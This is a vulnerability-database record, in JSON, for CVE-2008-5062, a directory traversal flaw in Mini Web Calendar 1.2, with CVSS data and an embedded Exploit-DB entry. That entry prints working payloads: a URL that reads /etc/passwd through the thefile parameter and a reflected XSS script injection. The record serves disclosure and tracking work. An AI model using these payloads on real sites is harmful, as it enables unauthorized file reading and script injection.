ID CVE-2008-5062
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:32:00
Description
Directory traversal vulnerability in php/cal_pdf.php in Mini Web Calendar (mwcal) 1.2 allows remote attackers to read arbitrary files via directory traversal sequences in the thefile parameter.
{"id": "CVE-2008-5062", "bulletinFamily": "NVD", "title": "CVE-2008-5062", "description": "Directory traversal vulnerability in php/cal_pdf.php in Mini Web Calendar (mwcal) 1.2 allows remote attackers to read arbitrary files via directory traversal sequences in the thefile parameter.", "published": "2008-11-13T11:30:00", "modified": "2017-09-29T01:32:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5062", "reporter": "cve@mitre.org", "references": ["http://www.vupen.com/english/advisories/2008/3077", "https://exchange.xforce.ibmcloud.com/vulnerabilities/46455", "https://www.exploit-db.com/exploits/7049", "http://secunia.com/advisories/32640", "http://www.securityfocus.com/bid/32196", "http://osvdb.org/49680", "http://securityreason.com/securityalert/4590"], "cvelist": ["CVE-2008-5062"], "type": "cve", "lastseen": "2019-05-29T18:09:29", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "bbdb56784e43371d4e562e263afc3cd8"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "b3e2f85fa297828cde7dd11c257cf195"}, {"key": "cpe23", "hash": "64944e7deef99f4a04f24223cd20ff00"}, {"key": "cvelist", "hash": "6ea3686077c932ecdce5ad598a199120"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "0658497da393ba8e7c2a5f76cfc6647b"}, {"key": "description", "hash": "244df4f740bfa93decee0cca66e62598"}, {"key": "href", "hash": "963f2c98743520a1c891768e844abab8"}, {"key": "modified", "hash": "43dd24ddc80228cca727a2ae69707805"}, {"key": "published", "hash": "9f61bef24257466076f3b1abbe3374e3"}, {"key": "references", "hash": "01c1d1ad789be00ece3f296176a358f5"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "2e3abeafb888ad5ee30a918eb9561b51"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c9453dcd73ccfc9343e7c594c5b5705cb92675a59dec606e12d533de34a9d96c", "viewCount": 0, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2019-05-29T18:09:29"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7049"]}], "modified": "2019-05-29T18:09:29"}, "vulnersScore": 5.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:smolinari:mini_web_calendar:1.2"], "affectedSoftware": [{"name": "smolinari mini_web_calendar", "operator": "eq", "version": "1.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:smolinari:mini_web_calendar:1.2:*:*:*:*:*:*:*"], "cwe": ["CWE-22"]}
{"exploitdb": [{"lastseen": "2016-02-01T02:17:32", "bulletinFamily": "exploit", "description": "Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities. CVE-2008-5061,CVE-2008-5062. Webapps exploit for php platform", "modified": "2008-11-07T00:00:00", "published": "2008-11-07T00:00:00", "id": "EDB-ID:7049", "href": "https://www.exploit-db.com/exploits/7049/", "type": "exploitdb", "title": "Mini Web Calendar 1.2 File Disclosure/XSS Multiple Vulnerabilities", "sourceData": "************************(XSS / FD Vulnerability)**************\n\nscript:Mini Web Calendar, ver. 1.2\n \n \n************************************************************************************************************\ndownload from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94\n \n************************************************************************************************************\n\n\n......................................................................................\nlocal file xpl:\n \nhttp://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd\n\nxss xpl:\n\nhttp://www.site.com/mwcal/php/cal_default.php/>'><ScRiPt>alert(0)</ScRiPt>\n\n\n\n***************************************************\n***************************************************\n\nAuthor: ahmadbady from http://www.deltahacking.net\n\nmy mail: kivi_hacker666@yahoo.com\n\n\n***************************************************\n\n# milw0rm.com [2008-11-07]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/7049/"}]}